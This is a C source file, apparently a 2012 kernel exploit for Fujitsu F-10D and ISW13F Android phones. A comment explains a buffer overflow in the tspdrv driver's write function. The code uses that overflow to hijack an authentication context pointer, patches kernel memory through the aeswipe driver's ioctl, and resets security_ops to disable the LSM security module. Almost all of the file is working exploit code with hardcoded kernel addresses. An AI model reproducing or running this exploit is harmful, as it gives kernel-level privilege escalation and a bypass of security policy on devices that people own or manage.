f10dunlock_test30.c

1. /*
2.  *  Copyright (c) 2012 goroh_kun
3.  *
4.  *  2012/09/03
5.  *  goroh.kun@gmail.com
6.  */
7.  
8. #include <stdio.h>
9. #include <stdint.h>
10. #include <stdlib.h>
11. #include <unistd.h>
12. #include <fcntl.h>
13. #include <errno.h>
14. #include <sys/stat.h>
15. #include <sys/mman.h>
16. #include <sys/ioctl.h>
17.  
18. void memdump(char* addr, int num)
19. {
20.     int i, j;
21.     int n = (num + 15) / 16;
22.     for (j=0; j<n; j++){
23.         printf("%08x : ", addr);
24.         for(i=0; i<16; i++){
25.             printf("%02x ", *addr++);
26.         }
27.         addr -= 16;
28.         for(i=0; i<16; i++){
29.             if (*addr>=0x20 && *addr<0x80) {
30.                  printf("%c", *addr);
31.             } else {
32.                 printf(".");
33.             }
34.             addr++;
35.         }
36.         printf("\n");
37.     }
38. }
39.  
40. #if 0
41. ########################################################################################
42. There is vulnerability in function "write" in kernel/drivers/tspdrv/tspdrv.c.
43.  
44. static ssize_t write(struct file *file, const char *buf, size_t count, loff_t *ppos)
45. {
46. ....
47.     /* Copy immediately the input buffer */
48.     if (0 != copy_from_user(g_cWriteBuffer, buf, count))
49.     {
50.         /* Failed to copy all the data, exit */
51.         DbgOut((KERN_ERR "tspdrv: copy_from_user failed.\n"));
52.         return 0;
53.     }
54.  
55.     /* Check buffer size */
56.     if ((count <= SPI_HEADER_SIZE) || (count > SPI_BUFFER_SIZE))
57.     {
58.         DbgOut((KERN_ERR "tspdrv: invalid write buffer size.\n"));
59.         return 0;
60.     }
61. ....
62. }
63.  
64.  
65.   We have to check the parameter "count" *before* using copy_from_user.
66.   Or if we set the parameter larger than g_cWriteBuffer size, it occurs memory overflow.
67.   In this case, I override a variable named g_lptsAuthContext by using this vulnerability.
68.   The variable is located like bellow.
69.  
70. g_cWriteBuffer    : 0xc09ae698
71. g_CalibrateBuffer : 0xc09ae6d0
72. g_lptsAuthContext : 0xc09ae6ec
73.  
74. ########################################################################################
75. #endif
76.  
77. #define BUF_SIZE  (0xc09ae6f0 - 0xc09ae698)
78. #define TSPDRV_MAGIC_NUMBER                 0x494D4D52
79. void set_lptsAuthContext(unsigned int addr)
80. {
81.   char buf[BUF_SIZE] = {0};
82.   buf[BUF_SIZE - 4] = addr & 0xff;
83.   buf[BUF_SIZE - 3] = (addr >> 8) & 0xff;
84.   buf[BUF_SIZE - 2] = (addr >> 16) & 0xff;
85.   buf[BUF_SIZE - 1] = (addr >> 24) & 0xff;
86.   int fdtsp = open("/dev/tspdrv", O_RDWR);
87.   int ret = ioctl(fdtsp, TSPDRV_MAGIC_NUMBER, 0);
88.   ret = write(fdtsp, buf, BUF_SIZE);
89.   close(fdtsp);
90. }
91.  
92. /*
93. ...
94. 100001a0 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ................
95. 100001b0 : -- -- -- -- -- -- -- -- 00 00 00 00 aa aa aa aa ................
96. 100001c0 : -- -- -- -- -- -- -- -- -- -- -- -- 01 00 00 00 ................
97. ...
98. 10000250 :*xx xx xx xx -- -- -- -- -- -- -- -- -- -- -- -- ................
99. ...
100. * pid is stored on xx xx xx xx, when /dev/aeswipe is opened.
101. * an ioctl AUTH_IOCTL_SET_TIMEOUT value is stored on aa aa aa aa.
102. */
103.  
104. typedef unsigned int uint32;
105. typedef int int32;
106. typedef struct _tag_TrIoctlHeader
107. {
108.     uint32 uiSize;          /* INOUT: Total size of the structure including header.         */
109.                             /*        On input it contains the size of the input buffer.    */
110.                             /*        On output it contains the size of the output buffer.  */
111.  
112.     uint32 uiOperationId;   /*    IN: ID of the desired operation. Needed for TransportIOCL */
113.                             /*        or on systems where everything is tunneled through a  */
114.                             /*        single IOCTL. See TrOperationId.                      */
115.  
116.     int32  retCode;         /*   OUT: Return code of the IOCTL.                             */
117. } tsTrIoctlHeader;
118.  
119. typedef struct _tag_TrTimeoutIoctlBuffer
120. {
121.     tsTrIoctlHeader sHeader;   /* INOUT: Header.         */
122.     uint32          uiTimeout; /*    IN: Timeout value.  */
123. } tsTrTimeoutIoctlBuffer;
124. #define AUTH_IOCTL_BASE ('x')
125. #define AUTH_IOCTL_SET_TIMEOUT          _IOWR( AUTH_IOCTL_BASE, 10, tsTrTimeoutIoctlBuffer )
126.  
127. void mempatch0(unsigned addr)
128. {
129.   char buf[0x300] = {0};
130.   set_lptsAuthContext((unsigned)buf);
131.   int fdaes = open("/dev/aeswipe", O_RDWR);
132.   usleep(10000);
133.   set_lptsAuthContext(addr - 0x1b8);
134.   close(fdaes);
135.   usleep(10000);
136.   set_lptsAuthContext(0);
137. }
138.  
139. void mempatch(int fd, unsigned addr, unsigned value)
140. {
141.   tsTrTimeoutIoctlBuffer param = {0};
142.   param.sHeader.uiSize = sizeof(param);
143.   param.uiTimeout = value;
144.  
145.   set_lptsAuthContext(addr - 0x1bc);
146.   ioctl(fd, AUTH_IOCTL_SET_TIMEOUT, &param);
147.   usleep(10000);
148.   set_lptsAuthContext(0);
149. }
150.  
151. static const unsigned original_code[] = {
152.   0xe24cb004, // SUB             R11, R12, #4
153.   0xe1a06001, // MOV             R6, R1
154. };
155.  
156. static const unsigned patched_code[] = {
157.   0xe5900084, // LDR             R0, [R0,#private] ; file->private
158.   0xe89da8f0, // LDMFD           SP, {R4-R7,R11,SP,PC}
159. };
160.  
161. static int is_isw13f = 0;
162. static int is_newf10d = 0;
163. unsigned int get_private(int fd, int fd2, unsigned aesbuf)
164. {
165.   char buf[0x10] = {0};
166.   unsigned int ret = 0;
167.  
168.   if(is_isw13f){
169.     mempatch(fd2, 0xc043f9e8, patched_code[0]); // module_entry_write+0x8
170.     mempatch(fd2, 0xc043f9ec, patched_code[1]); // module_entry_write+0xc
171.   }else{
172.     if(is_newf10d){
173.       mempatch(fd2, 0xc044d238, patched_code[0]); // module_entry_write+0x8
174.       mempatch(fd2, 0xc044d23c, patched_code[1]); // module_entry_write+0xc
175.     }else{
176.       mempatch(fd2, 0xc044d20c, patched_code[0]); // module_entry_write+0x8
177.       mempatch(fd2, 0xc044d210, patched_code[1]); // module_entry_write+0xc
178.     }
179.   }
180.  
181.   set_lptsAuthContext((unsigned)aesbuf);
182.   ret = write(fd, buf, 1);
183.   usleep(10000);
184.  
185.   if(is_isw13f){
186.     mempatch(fd2, 0xc043f9e8, original_code[0]); // module_entry_write+0x8
187.     mempatch(fd2, 0xc043f9ec, original_code[1]); // module_entry_write+0xc
188.   }else{
189.     if(is_newf10d){
190.       mempatch(fd2, 0xc044d238, original_code[0]); // module_entry_write+0x8
191.       mempatch(fd2, 0xc044d23c, original_code[1]); // module_entry_write+0xc
192.     }else{
193.       mempatch(fd2, 0xc044d20c, original_code[0]); // module_entry_write+0x8
194.       mempatch(fd2, 0xc044d210, original_code[1]); // module_entry_write+0xc
195.     }
196.   }
197.   return ret;
198. }
199.  
200. int main(int argc, char** argv)
201. {
202.   char buf[0x300] = {0};
203.   int recovery_context = 1;
204.   unsigned int context_addr = 0;
205.   if(argc >= 2 && atoi(argv[1])==1){
206.     printf("use ISW13F address\n");
207.     is_isw13f = 1;
208.   }
209.   if(argc >= 2 && atoi(argv[1])==2){
210.     printf("use new F-10D address\n");
211.     is_newf10d = 1;
212.   }
213.  
214.   int fdaes = open("/dev/aeswipe", O_RDWR);
215.   printf("fdaes = %d\n", fdaes);
216.   if(fdaes < 0){
217.     printf("open aeswipe error, so try to disable LSM without recovery g_lptsAuthContext\n");
218.     recovery_context = 0;
219.   }
220.  
221.   set_lptsAuthContext((unsigned)buf);
222.   int fdaes2 = open("/dev/aeswipe", O_RDWR);
223.   usleep(10000);
224.   set_lptsAuthContext(0);
225.   printf("fdaes2 = %d\n", fdaes2);
226.  
227.   //AuthTransportIOControl disable AbortCheck
228.   if(is_isw13f){
229.     mempatch0(0xc043e2fc); // 0xc043e2fc, 0xc043e310 = 0
230.     mempatch0(0xc043e300); // 0xc043e300, 0xc043e314 = 0
231.     mempatch0(0xc043e304); // 0xc043e304, 0xc043e318 = 0
232.     mempatch0(0xc043e308); // 0xc043e308, 0xc043e31c = 0
233.     mempatch0(0xc043e30c); // 0xc043e30c, 0xc043e320 = 0
234.   }else{
235.     if(is_newf10d){
236.       mempatch0(0xc044bb4c); // 0xc044bb4c, 0xc044bb60 = 0
237.       mempatch0(0xc044bb50); // 0xc044bb50, 0xc044bb64 = 0
238.       mempatch0(0xc044bb54); // 0xc044bb54, 0xc044bb68 = 0
239.       mempatch0(0xc044bb58); // 0xc044bb58, 0xc044bb6c = 0
240.       mempatch0(0xc044bb5c); // 0xc044bb5c, 0xc044bb70 = 0
241.     }else{
242.       mempatch0(0xc044bb14); // 0xc044bb14, 0xc044bb28 = 0
243.       mempatch0(0xc044bb18); // 0xc044bb18, 0xc044bb2c = 0
244.       mempatch0(0xc044bb1c); // 0xc044bb1c, 0xc044bb30 = 0
245.       mempatch0(0xc044bb20); // 0xc044bb20, 0xc044bb34 = 0
246.       mempatch0(0xc044bb24); // 0xc044bb24, 0xc044bb38 = 0
247.     }
248.   }
249.  
250.   if(recovery_context){
251.     context_addr = get_private(fdaes, fdaes2, (unsigned)buf);
252.     printf("file->private = %08x\n", context_addr);
253.     if(context_addr >= 0xffff0000) context_addr = 0;
254.     if(context_addr <= 0xc0000000) context_addr = 0;
255.   }
256.  
257.   if(is_isw13f){
258.     mempatch(fdaes2, 0xc09e5290, 0xc09308ec); // security_ops = default_security_ops
259.   }else{
260.     mempatch(fdaes2, 0xc098ed48, 0xc08da184); // security_ops = default_security_ops
261.   }
262.  
263.   set_lptsAuthContext((unsigned)buf);
264.   close(fdaes2);
265.   usleep(10000);
266.  
267.   set_lptsAuthContext(context_addr);
268.   close(fdaes);
269.   return 0;
270. }